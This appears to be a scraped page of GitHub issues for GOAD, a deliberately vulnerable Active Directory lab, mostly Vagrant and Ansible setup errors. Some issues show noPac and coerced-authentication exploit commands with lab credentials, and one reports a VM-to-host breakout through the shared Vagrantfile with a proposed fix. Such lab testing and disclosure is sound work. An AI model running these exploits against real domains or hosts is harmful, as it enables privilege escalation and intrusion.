45: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/util/busy.rb:19:in busy' 44: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/action/runner.rb:101:in
block in run'
43: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/action/builder.rb:180:in call' 42: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/action/warden.rb:48:in
call'
41: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/action/warden.rb:127:in block in finalize_action' 40: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/action/warden.rb:48:in
call'
39: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/action/warden.rb:127:in block in finalize_action' 38: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/action/warden.rb:48:in
call'
37: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/action/builtin/call.rb:43:in call' 36: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/action/runner.rb:101:in
run'
35: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/util/busy.rb:19:in busy' 34: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/action/runner.rb:101:in
block in run'
33: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/action/builder.rb:180:in call' 32: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/action/warden.rb:48:in
call'
31: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/action/builtin/graceful_halt.rb:50:in call' 30: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/machine.rb:283:in
guest'
29: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/plugins/communicators/winrm/communicator.rb:106:in ready?' 28: from /opt/vagrant/embedded/lib/ruby/2.7.0/timeout.rb:110:in
timeout'
27: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/plugins/communicators/winrm/communicator.rb:107:in block in ready?' 26: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/plugins/communicators/winrm/shell.rb:70:in
cmd'
25: from /opt/vagrant/embedded/gems/2.3.2/gems/winrm-2.3.6/lib/winrm/connection.rb:42:in shell' 24: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/plugins/communicators/winrm/shell.rb:71:in
block in cmd'
23: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/plugins/communicators/winrm/shell.rb:138:in execute_with_rescue' 22: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/plugins/communicators/winrm/shell.rb:144:in
handle_output'
21: from /opt/vagrant/embedded/gems/2.3.2/gems/winrm-2.3.6/lib/winrm/shells/base.rb:79:in run' 20: from /opt/vagrant/embedded/gems/2.3.2/gems/winrm-2.3.6/lib/winrm/shells/base.rb:128:in
with_command_shell'
19: from /opt/vagrant/embedded/gems/2.3.2/gems/winrm-2.3.6/lib/winrm/shells/base.rb:168:in open' 18: from /opt/vagrant/embedded/gems/2.3.2/gems/winrm-2.3.6/lib/winrm/shells/retryable.rb:35:in
retryable'
17: from /opt/vagrant/embedded/gems/2.3.2/gems/winrm-2.3.6/lib/winrm/shells/base.rb:170:in block in open' 16: from /opt/vagrant/embedded/gems/2.3.2/gems/winrm-2.3.6/lib/winrm/shells/cmd.rb:54:in
open_shell'
15: from /opt/vagrant/embedded/gems/2.3.2/gems/winrm-2.3.6/lib/winrm/http/transport.rb:168:in send_request' 14: from /opt/vagrant/embedded/gems/2.3.2/gems/winrm-2.3.6/lib/winrm/http/transport.rb:236:in
init_auth'
13: from /opt/vagrant/embedded/gems/2.3.2/gems/httpclient-2.8.3/lib/httpclient.rb:765:in post' 12: from /opt/vagrant/embedded/gems/2.3.2/gems/httpclient-2.8.3/lib/httpclient.rb:856:in
request'
11: from /opt/vagrant/embedded/gems/2.3.2/gems/httpclient-2.8.3/lib/httpclient.rb:1014:in do_request' 10: from /opt/vagrant/embedded/gems/2.3.2/gems/httpclient-2.8.3/lib/httpclient.rb:1133:in
protect_keep_alive_disconnected'
9: from /opt/vagrant/embedded/gems/2.3.2/gems/httpclient-2.8.3/lib/httpclient.rb:1019:in block in do_request' 8: from /opt/vagrant/embedded/gems/2.3.2/gems/httpclient-2.8.3/lib/httpclient.rb:1245:in
do_get_block'
7: from /opt/vagrant/embedded/gems/2.3.2/gems/httpclient-2.8.3/lib/httpclient.rb:1299:in do_get_header' 6: from /opt/vagrant/embedded/gems/2.3.2/gems/httpclient-2.8.3/lib/httpclient/session.rb:561:in
get_header'
5: from /opt/vagrant/embedded/gems/2.3.2/gems/httpclient-2.8.3/lib/httpclient/session.rb:784:in read_header' 4: from /opt/vagrant/embedded/gems/2.3.2/gems/httpclient-2.8.3/lib/httpclient/session.rb:801:in
parse_header'
3: from /opt/vagrant/embedded/lib/ruby/2.7.0/timeout.rb:105:in timeout' 2: from /opt/vagrant/embedded/lib/ruby/2.7.0/timeout.rb:95:in
block in timeout'
1: from /opt/vagrant/embedded/gems/2.3.2/gems/httpclient-2.8.3/lib/httpclient/session.rb:805:in block in parse_header' /opt/vagrant/embedded/gems/2.3.2/gems/httpclient-2.8.3/lib/httpclient/session.rb:805:in
gets': execution expired (Timeout::Error)
fatal: [172.24.126.10]: FAILED! => {"changed": true, "msg": "Failed to install ADDSForest, DCPromo exited with 54: The operation failed with the following error:\r\n\r\nThe specified procedure could not be found.\r\n", "reboot_required": false}
Any info on this one ?
Many thanks for the project !
how can i change the installation path for all vagrant VMs? i wanna setup the lab in a separate ssd partition.
I have the same issue as #17 but i cant apply the solution whcih solved the problem as i cant downgrade vagrant to this old version and if i downgrade vagrant i must also downgrade virtualbox to an old version like 6.0. Here is the error:
Post ansible config of the server i circled back to configure elk, however it fails when checking if chocolatey is installed, with the following error
fatal: [192.168.56.11]: FAILED! => {"changed": false, "command": "C:\ProgramData\chocolatey\bin\choco.exe install chocolatey-core.extension --fail-on-unfound --yes --no-progress --limit-output --timeout 2700", "msg": "Error installing package(s) 'chocolatey-core.extension'", "rc": 1, "stderr": "", "stderr_lines": [], "stdout": "Installing the following packages:\r\nchocolatey-core.extension\r\nBy installing, you accept licenses for the packages.\r\nchocolatey-core.extension not installed. An error occurred during installation:\r\n The remote server returned an error: (429) Too Many Requests. Too Many Requests\r\nchocolatey-core.extension package files install failed with exit code 1. Performing other installation steps.\r\nThe install of chocolatey-core.extension was NOT successful.\r\nchocolatey-core.extension not installed. An error occurred during installation:\r\n The remote server returned an error: (429) Too Many Requests. Too Many Requests\r\n\r\nChocolatey installed 0/1 packages. 1 packages failed.\r\n See the log for details (C:\ProgramData\chocolatey\logs\chocolatey.log).\r\n\r\nFailures\r\n - chocolatey-core.extension (exited 1) - chocolatey-core.extension not installed. An error occurred during installation:\r\n The remote server returned an error: (429) Too Many Requests. Too Many Requests\r\n", "stdout_lines": ["Installing the following packages:", "chocolatey-core.extension", "By installing, you accept licenses for the packages.", "chocolatey-core.extension not installed. An error occurred during installation:", " The remote server returned an error: (429) Too Many Requests. Too Many Requests", "chocolatey-core.extension package files install failed with exit code 1. Performing other installation steps.", "The install of chocolatey-core.extension was NOT successful.", "chocolatey-core.extension not installed. An error occurred during installation:", " The remote server returned an error: (429) Too Many Requests. Too Many Requests", "", "Chocolatey installed 0/1 packages. 1 packages failed.", " See the log for details (C:\ProgramData\chocolatey\logs\chocolatey.log).", "", "Failures", " - chocolatey-core.extension (exited 1) - chocolatey-core.extension not installed. An error occurred during installation:", " The remote server returned an error: (429) Too Many Requests. Too Many Requests"]}
It does how ever appear to work on SRV03 !
Hello,
Thk for all the work in this repot.
I got an error with the noPac vulns (CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user)
└─# python3 noPac.py essos.local/viserys.targaryen:GoldCrown -dc-ip 192.168.56.12
███ ██ ██████ ██████ █████ ██████
████ ██ ██ ██ ██ ██ ██ ██ ██
██ ██ ██ ██ ██ ██████ ███████ ██
██ ██ ██ ██ ██ ██ ██ ██ ██
██ ████ ██████ ██ ██ ██ ██████
[*] Current ms-DS-MachineAccountQuota = 10
[*] Selected Target meereen.essos.local
[*] Total Domain Admins 2
[*] will try to impersonat daenerys.targaryen
[*] Adding Computer Account "WIN-D8KGLE4YSFE$"
[*] MachineAccount "WIN-D8KGLE4YSFE$" password = FXGlOanW(foZ
[*] Successfully added machine account WIN-D8KGLE4YSFE$ with password FXGlOanW(foZ.
[*] WIN-D8KGLE4YSFE$ object = CN=WIN-D8KGLE4YSFE,CN=Computers,DC=essos,DC=local
[-] Cannot rename the machine account , Reson 00000524: UpdErr: DSID-031A11E2, problem 6005 (ENTRY_EXISTS), data 0
[*] Attempting to del a computer with the name: WIN-D8KGLE4YSFE$
[-] Delete computer WIN-D8KGLE4YSFE$ Failed! Maybe the current user does not have permission.
it seems that the serveur is vulnerable for cme ...
└─# cme smb 192.168.56.12 -u viserys.targaryen -p GoldCrown -M nopac
SMB 192.168.56.12 445 MEEREEN [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True)
NOPAC 192.168.56.12 445 MEEREEN TGT with PAC size 1534
NOPAC 192.168.56.12 445 MEEREEN TGT without PAC size 729
NOPAC 192.168.56.12 445 MEEREEN
NOPAC 192.168.56.12 445 MEEREEN VULNEABLE
NOPAC 192.168.56.12 445 MEEREEN Next step: https://github.com/Ridter/noPac
Did i something wrong ?
i try also with this known repo : https://github.com/WazeHell/sam-the-admin
A+
This lab is awesome! I've been playing around with it for a bit now.
It would be great for people to try the WebDAV coerced auth trick somewhere in the lab. E.g.
./Coercer.py -wh hackerbox -t braavos -u <essos_user> -p <user_pass>
By default this will not work. The target must have the WebClient service enabled. This service does not exist by default on Windows Servers, so to get it, we'd need to add the WebDAV Redirector role/feature. We then set the WebClient service to start on boot.
Performing this coerced auth with would tie in nicely to the RBCD attack again Meereen & Braavos.
Keen to hear your thoughts. 🙂
Thanks for creating such a wonderful lab. Environment configured and working well except for this one error:
TASK [member_server : Add member server] ************************************************ ok: [192.168.56.23] fatal: [192.168.56.22]: FAILED! => {"changed": true, "msg": "failed to join domain: Computer 'castelblack' failed to join domain 'north.sevenkingdoms.local' from its current workgroup 'WORKGROUP' with following error message: The specified network name is no longer available.", "reboot_required": false}
System details:
$ lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 18.04.6 LTS Release: 18.04 Codename: bionic
$ vagrant --version Vagrant 2.2.19
$ vboxmanage --version 6.1.34r150636
$ ansible --version ansible [core 2.12.6] config file = /home/user/GOAD/ansible/ansible.cfg configured module search path = ['/home/user/.ansible/plugins/modules', '/usr/share/ansible/plugins/modules'] ansible python module location = /home/user/GOAD/ansible/.venv/lib/python3.8/site-packages/ansible ansible collection location = /home/user/.ansible/collections:/usr/share/ansible/collections executable location = /home/user/GOAD/ansible/.venv/bin/ansible python version = 3.8.0 (default, Dec 9 2021, 17:53:27) [GCC 8.4.0] jinja version = 3.1.2 libyaml = True
Happy to provide whatever extra information might be required to investigate and resolve.
Vagrant synced folders are enabled, allowing trivial breakout of the environment by modifying the shared Vagrantfile
file, leading to execution of arbitrary Ruby code on the host running Vagrant when the GOAD user runs any vagrant
command from within the goad
directory (such as vagrant status
) or child directories.
Shared folders are enabled:
user@dev-ubuntu:~/vagrant/goad$ vagrant --version
Vagrant 2.3.1
user@dev-ubuntu:~/vagrant/goad$ vagrant up
[...]
==> DC01: Mounting shared folders...
DC01: /vagrant => /home/user/vagrant/goad
We can write to contents of shared folders from the C:\vagrant
directory within a GOAD virtual machine.
Ruby code inserted into the Vagrantfile
from within a virtual machine is executed when a user runs vagrant
commands:
user@dev-ubuntu:~/vagrant/goad$ ls pwned
ls: cannot access 'pwned': No such file or directory
user@dev-ubuntu:~/vagrant/goad$ vagrant status
bcoles was here 2022
Current machine states:
DC01 running (virtualbox)
DC02 running (virtualbox)
DC03 running (virtualbox)
SRV02 running (virtualbox)
SRV03 running (virtualbox)
This environment represents multiple VMs. The VMs are all listed
above with their current state. For more information about a specific
VM, run `vagrant status NAME`.
user@dev-ubuntu:~/vagrant/goad$ cat pwned
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare),138(libvirt)
user@dev-ubuntu:~/vagrant/goad$
There may be a way to exploit this without waiting for user interaction (perhaps symlinks as per below) but I haven't looked into it. It is likely that users will eventually run vagrant status
or vagrant halt
.
Additionally, GOAD is an intentionally vulnerable environment. Numerous user accounts and services are configured with publicly documented default credentials. GOAD exposes various network services (such as RDP) to the LAN, allowing access to the vulnerable hosts on the virtual LAN using default credentials.
user@dev-ubuntu:~/vagrant/goad$ vagrant up DC01
Bringing machine 'DC01' up with 'virtualbox' provider...
==> DC01: Checking if box 'StefanScherer/windows_2019' version '2021.05.15' is up to date...
==> DC01: Clearing any previously set forwarded ports...
==> DC01: Clearing any previously set network interfaces...
==> DC01: Preparing network interfaces based on configuration...
DC01: Adapter 1: nat
DC01: Adapter 2: hostonly
==> DC01: Forwarding ports...
DC01: 3389 (guest) => 3389 (host) (adapter 1)
DC01: 5985 (guest) => 55985 (host) (adapter 1)
DC01: 5986 (guest) => 55986 (host) (adapter 1)
DC01: 22 (guest) => 2222 (host) (adapter 1)
==> DC01: Running 'pre-boot' VM customizations...
==> DC01: Booting VM...
==> DC01: Waiting for machine to boot. This may take a few minutes...
DC01: WinRM address: 127.0.0.1:55985
DC01: WinRM username: vagrant
DC01: WinRM execution_time_limit: PT2H
DC01: WinRM transport: negotiate
==> DC01: Machine booted and ready!
==> DC01: Checking for guest additions in VM...
==> DC01: Configuring and enabling network interfaces...
==> DC01: Mounting shared folders...
DC01: /vagrant => /home/user/vagrant/goad
==> DC01: Machine already provisioned. Run `vagrant provision` or use the `--provision`
==> DC01: flag to force provisioning. Provisioners marked to run always will still run.
user@dev-ubuntu:~/vagrant/goad$ netstat -an | grep 3389
tcp 0 0 0.0.0.0:3389 0.0.0.0:* LISTEN
$ sudo lsof -i :3389
[sudo] password for user:
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
VBoxHeadl 9592 user 20u IPv4 79136 0t0 TCP *:ms-wbt-server (LISTEN)
Remote network access to these services combined with writable Shared Folders effectively allows remote exploitation of the host running GOAD.
As far as I'm aware shared folders are not required. If shared folders are not required, the default vagrant
share should be explicitly disabled:
diff --git a/Vagrantfile b/Vagrantfile
index 47b3b77..99a6627 100644
--- a/Vagrantfile
+++ b/Vagrantfile
@@ -38,6 +38,8 @@ boxes = [
# { :name => "SRV03", :ip => "192.168.56.23", :box => "jborean93/WindowsServer2016", :os => "windows"}
# ]
+ config.vm.synced_folder '.', '/vagrant', disabled: true
+
config.vm.provider "virtualbox" do |v|
v.memory = 3000
v.cpus = 2
In theory the above change should be sufficient - although when I tried applying the above change the shared folder was still mounted. Perhaps it needs to be disabled for each box
.
Additionally, if shared folders are required, ensure symlinks are disabled for all shared folders:
config.vm.synced_folder '.', '/a-shared-path', SharedFoldersEnableSymlinksCreate: false
See also:
I keep on running in these issues:
servers.yml:
TASK [mssql : Add MSSQL admin] *****************************************************************
failed: [192.168.56.22] (item=NORTH\jon.snow) => {"ansible_loop_var": "item", "changed": true, "cmd": "SqlCmd -E -Q "CREATE LOGIN [NORTH\jon.snow] FROM WINDOWS"\nSqlCmd -E -Q "SP_ADDSRVROLEMEMBER 'NORTH\jon.snow','SYSADMIN'"", "delta": "0:00:18.890751", "end": "2022-11-15 15:52:04.494095", "item": "NORTH\jon.snow", "msg": "non-zero return code", "rc": 1, "start": "2022-11-15 15:51:45.603343", "stderr": "Sqlcmd: Error: Microsoft ODBC Driver 17 for SQL Server : Named Pipes Provider: Could not open a connection to SQL Server [2]. .\r\nSqlcmd: Error: Microsoft ODBC Driver 17 for SQL Server : Login timeout expired.\r\nSqlcmd: Error: Microsoft ODBC Driver 17 for SQL Server : A network-related or instance-specific error has occurred while establishing a connection to SQL Server. Server is not found or not accessible. Check if instance name is correct and if SQL Server is configured to allow remote connections. For more information see SQL Server Books Online..\r\nSqlcmd: Error: Microsoft ODBC Driver 17 for SQL Server : Named Pipes Provider: Could not open a connection to SQL Server [2]. .\r\nSqlcmd: Error: Microsoft ODBC Driver 17 for SQL Server : Login timeout expired.\r\nSqlcmd: Error: Microsoft ODBC Driver 17 for SQL Server : A network-related or instance-specific error has occurred while establishing a connection to SQL Server. Server is not found or not accessible. Check if instance name is correct and if SQL Server is configured to allow remote connections. For more information see SQL Server Books Online..", "stderr_lines": ["Sqlcmd: Error: Microsoft ODBC Driver 17 for SQL Server : Named Pipes Provider: Could not open a connection to SQL Server [2]. .", "Sqlcmd: Error: Microsoft ODBC Driver 17 for SQL Server : Login timeout expired.", "Sqlcmd: Error: Microsoft ODBC Driver 17 for SQL Server : A network-related or instance-specific error has occurred while establishing a connection to SQL Server. Server is not found or not accessible. Check if instance name is correct and if SQL Server is configured to allow remote connections. For more information see SQL Server Books Online..", "Sqlcmd: Error: Microsoft ODBC Driver 17 for SQL Server : Named Pipes Provider: Could not open a connection to SQL Server [2]. .", "Sqlcmd: Error: Microsoft ODBC Driver 17 for SQL Server : Login timeout expired.", "Sqlcmd: Error: Microsoft ODBC Driver 17 for SQL Server : A network-related or instance-specific error has occurred while establishing a connection to SQL Server. Server is not found or not accessible. Check if instance name is correct and if SQL Server is configured to allow remote connections. For more information see SQL Server Books Online.."], "stdout": "", "stdout_lines": []}
ad-relations.yml
TASK [groups_domains : Add a domain user/group from another Domain in the multi-domain forest to a domain group : {{domain_server}}] ***
ok: [192.168.56.11] => (item={'key': 'AcrossTheSea', 'value': ['essos.local\daenerys.targaryen']})
ok: [192.168.56.12] => (item={'key': 'DragonsFriends', 'value': ['sevenkingdoms.local\tyron.lannister', 'essos.local\daenerys.targaryen']})
FAILED - RETRYING: [192.168.56.10]: Add a domain user/group from another Domain in the multi-domain forest to a domain group : {{domain_server}} (3 retries left).
ok: [192.168.56.12] => (item={'key': 'Spys', 'value': ['sevenkingdoms.local\Small Council']})
FAILED - RETRYING: [192.168.56.10]: Add a domain user/group from another Domain in the multi-domain forest to a domain group : {{domain_server}} (2 retries left).
FAILED - RETRYING: [192.168.56.10]: Add a domain user/group from another Domain in the multi-domain forest to a domain group : {{domain_server}} (1 retries left).
An exception occurred during task execution. To see the full traceback, use -vvv. The error was: at Microsoft.ActiveDirectory.Management.Commands.ADCmdletBase`1.BeginProcessing()
failed: [192.168.56.10] (item={'key': 'AcrossTheNarrowSea', 'value': ['essos.local\daenerys.targaryen']}) => {"ansible_loop_var": "item", "attempts": 3, "changed": false, "item": {"key": "AcrossTheNarrowSea", "value": ["essos.local\daenerys.targaryen"]}, "msg": "Unhandled exception while executing module: A call to SSPI failed, see inner exception."}
FYI, I'm looking into running the lab on a Mac M1 using Parallels instead of VirtualBox (not sure if that it's even possible).
The first issue I ran into is the fact that there are no box available for the Parallels provider.
I checked to see if I could build them myself and ran into this issue: StefanScherer/packer-windows#320
We can keep this issue open to track the progress.
This issue is just in case someone attempt to do the same thing. I did not go further.
VMware Fusion: 13.0.0
Vagrant: 2.3.4
OS: Ventura
❯ vagrant up --provider vmware_desktop
Bringing machine 'DC01' up with 'vmware_desktop' provider...
Bringing machine 'DC02' up with 'vmware_desktop' provider...
Bringing machine 'DC03' up with 'vmware_desktop' provider...
Bringing machine 'SRV02' up with 'vmware_desktop' provider...
Bringing machine 'SRV03' up with 'vmware_desktop' provider...
==> DC01: Box 'StefanScherer/windows_2019' could not be found. Attempting to find and install...
DC01: Box Provider: vmware_desktop, vmware_fusion, vmware_workstation
DC01: Box Version: 2021.05.15
==> DC01: Loading metadata for box 'StefanScherer/windows_2019'
DC01: URL: https://vagrantcloud.com/StefanScherer/windows_2019
==> DC01: Adding box 'StefanScherer/windows_2019' (v2021.05.15) for provider: vmware_desktop
DC01: Downloading: https://vagrantcloud.com/StefanScherer/boxes/windows_2019/versions/2021.05.15/providers/vmware_desktop.box
==> DC01: Successfully added box 'StefanScherer/windows_2019' (v2021.05.15) for 'vmware_desktop'!
==> DC01: Cloning VMware VM: 'StefanScherer/windows_2019'. This can take some time...
==> DC01: Checking if box 'StefanScherer/windows_2019' version '2021.05.15' is up to date...
==> DC01: Verifying vmnet devices are healthy...
Vagrant failed to create a new VMware networking device. The following
error message was generated while attempting to create a new device:
Networks with custom subnet/mask values are not supported on this platform
Please resolve any problems reported in the error message above and
try again.
Requirements:
Install the vagrant plugin for the vmware provider:
vagrant plugin install vagrant-vmware-desktop
Install Vagrant VMware Utility (invalid certificate cf: hashicorp/vagrant-vmware-desktop#56):
There's an error while creating users arya.stark, eddard.stark, catelyn.stark and robb.stark.
An exception occurred during task execution. To see the full traceback, use -vvv. The error was: at , : line 475
failed: [192.168.56.11] (item={'key': 'arya.stark', 'value': {'firstname': 'Arya', 'surname': 'Stark',
...
"msg": "Unhandled exception while executing module: The term 'Add-Warning' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again."}+
Thanks in advanced.
I am getting these 2 errors in the ansible-playbook main command:
TASK [settings/hostname : Reboot if needed] ****************************************************************************************************************************************
changed: [192.168.56.12]
changed: [192.168.56.23]
An exception occurred during task execution. To see the full traceback, use -vvv. The error was: Exception: Timed out waiting for last boot time check (timeout=600.0)
fatal: [192.168.56.11]: FAILED! => {"changed": true, "elapsed": 630, "msg": "Timed out waiting for last boot time check (timeout=600.0)", "rebooted": true, "unreachable": false}
An exception occurred during task execution. To see the full traceback, use -vvv. The error was: Exception: Timed out waiting for last boot time check (timeout=600.0)
fatal: [192.168.56.10]: FAILED! => {"changed": true, "elapsed": 637, "msg": "Timed out waiting for last boot time check (timeout=600.0)", "rebooted": true, "unreachable": false}
An exception occurred during task execution. To see the full traceback, use -vvv. The error was: Exception: Timed out waiting for last boot time check (timeout=600.0)
fatal: [192.168.56.22]: FAILED! => {"changed": true, "elapsed": 648, "msg": "Timed out waiting for last boot time check (timeout=600.0)", "rebooted": true, "unreachable": false}
TASK [mssql : Add service account to Log on as a service] **************************************************************************************************************************
fatal: [192.168.56.23]: FAILED! => {"added": [], "changed": false, "msg": "Failed to translate the account 'essos.local\sql_svc' to a SID", "removed": []}
PLAY RECAP *************************************************************************************************************************************************************************
192.168.56.10 : ok=14 changed=8 unreachable=0 failed=1 skipped=2 rescued=0 ignored=0
192.168.56.11 : ok=14 changed=8 unreachable=0 failed=1 skipped=2 rescued=0 ignored=0
192.168.56.12 : ok=30 changed=19 unreachable=0 failed=1 skipped=3 rescued=0 ignored=0
192.168.56.22 : ok=13 changed=7 unreachable=0 failed=1 skipped=2 rescued=0 ignored=0
192.168.56.23 : ok=41 changed=21 unreachable=0 failed=1 skipped=3 rescued=0 ignored=0
Is there a simple command or process I can utilize to resolve this issue?
All the servers startup except DC01. When I start it, SRV03 is aborted. Is that a resource issue? I have 32GB memory and 1TB storage,
Thanks
I am using windows and ubuntu, with vagrant i updated all machines but my problem is when i used ansible-playbooks in ubuntu
ansible [core 2.12.6]
(env) root@DESKTOP-I3MKVRC:/mnt/e/LabSources/vagrant/GOAD/ansible# ansible --version
[WARNING]: Ansible is being run in a world writable directory (/mnt/e/LabSources/vagrant/GOAD/ansible), ignoring it as an ansible.cfg source. For more
information see https://docs.ansible.com/ansible/devel/reference_appendices/config.html#cfg-in-world-writable-dir
ansible [core 2.12.6]
config file = /etc/ansible/ansible.cfg
configured module search path = ['/root/.ansible/plugins/modules', '/usr/share/ansible/plugins/modules']
ansible python module location = /usr/local/lib/python3.8/dist-packages/ansible
ansible collection location = /root/.ansible/collections:/usr/share/ansible/collections
executable location = /usr/local/bin/ansible
python version = 3.8.0 (default, Dec 9 2021, 17:53:27) [GCC 8.4.0]
jinja version = 2.10
libyaml = False
(env) root@DESKTOP-I3MKVRC:/mnt/e/LabSources/vagrant/GOAD/ansible# ansible-playbook main.yml
[WARNING]: Ansible is being run in a world writable directory (/mnt/e/LabSources/vagrant/GOAD/ansible), ignoring it as an ansible.cfg source. For more
information see https://docs.ansible.com/ansible/devel/reference_appendices/config.html#cfg-in-world-writable-dir
[WARNING]: Could not match supplied host pattern, ignoring: dc01
[WARNING]: Could not match supplied host pattern, ignoring: dc02
[WARNING]: Could not match supplied host pattern, ignoring: dc03
[WARNING]: Could not match supplied host pattern, ignoring: srv01
[WARNING]: Could not match supplied host pattern, ignoring: srv02
[WARNING]: Could not match supplied host pattern, ignoring: srv03
PLAY [build all] ************************************************************************************************************************************************
skipping: no hosts matched
PLAY [build all no update] **************************************************************************************************************************************
skipping: no hosts matched
PLAY [Launch windows updates before continue] *******************************************************************************************************************
skipping: no hosts matched
PLAY [Read data files] ******************************************************************************************************************************************
TASK [Gathering Facts] ******************************************************************************************************************************************
ok: [192.168.0.108]
ok: [192.168.142.129]
ERROR! an undefined variable was found when attempting to template the vars_files item '{{data_path}}/config.json'
The error appears to be in '/mnt/e/LabSources/vagrant/GOAD/ansible/data.yml': line 6, column 7, but may
be elsewhere in the file depending on the exact syntax problem.
The offending line appears to be:
vars_files:
- "{{data_path}}/config.json"
^ here
We could be wrong, but this one looks like it might be an issue with
missing quotes. Always quote template expression brackets when they
start a value. For instance:
with_items:
- {{ foo }}
Should be written as:
with_items:
- "{{ foo }}"
Hello,
when running the ansible-playbook main.yml, the script runs into the following issue:
TASK [child_domain : disable interface Ethernet before join domain] *******************************************************
fatal: [172.18.100.11]: FAILED! => {"changed": true, "cmd": "netsh interface set interface \"Ethernet\" disable", "delta": "0:00:00.906198", "end": "2022-07-22 06:32:15.861635", "msg": "non-zero return code", "rc": 1, "start": "2022-07-22 06:32:14.955437", "stderr": "", "stderr_lines": [], "stdout": "No more data is available.\r\n\r\n\r\n", "stdout_lines": ["No more data is available.", "", ""]}
From my first look at the issue, this appears to be cause by the fact that the standard network interface in Server 2019 is called "Ethernet0" instead of "Ethernet".
The server itself is reachable though.
Any help would be appreciated.
When porting to VMware I discovered a missing var:
adapter_names: 'Ethernet 2' # -> adapter_names: "{{domain_adapter}}"
affected files:
TASK [common : Windows | Check for ComputerManagementDsc Powershell module] ***********************************************************************************************************************************************************************************************************************************************
fatal: [192.168.56.12]: FAILED! => {"changed": true, "msg": "Problems installing ComputerManagementDsc module: A parameter cannot be found that matches parameter name 'AcceptLicense'.", "nuget_changed": true, "output": "", "repository_changed": false}
fatal: [192.168.56.23]: FAILED! => {"changed": true, "msg": "Problems installing ComputerManagementDsc module: A parameter cannot be found that matches parameter name 'AcceptLicense'.", "nuget_changed": true, "output": "", "repository_changed": false}
fatal: [192.168.56.22]: FAILED! => {"changed": true, "msg": "Problems installing ComputerManagementDsc module: A parameter cannot be found that matches parameter name 'AcceptLicense'.", "nuget_changed": true, "output": "", "repository_changed": false}
fatal: [192.168.56.10]: FAILED! => {"changed": true, "msg": "Problems installing ComputerManagementDsc module: A parameter cannot be found that matches parameter name 'AcceptLicense'.", "nuget_changed": true, "output": "", "repository_changed": false}
fatal: [192.168.56.11]: FAILED! => {"changed": true, "msg": "Problems installing ComputerManagementDsc module: A parameter cannot be found that matches parameter name 'AcceptLicense'.", "nuget_changed": true, "output": "", "repository_changed": false}
is like community.windows galaxy don't work as execpt
i have install this module on dc1 and got this after:
if someone can help me to pass this error, thanks in advance
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.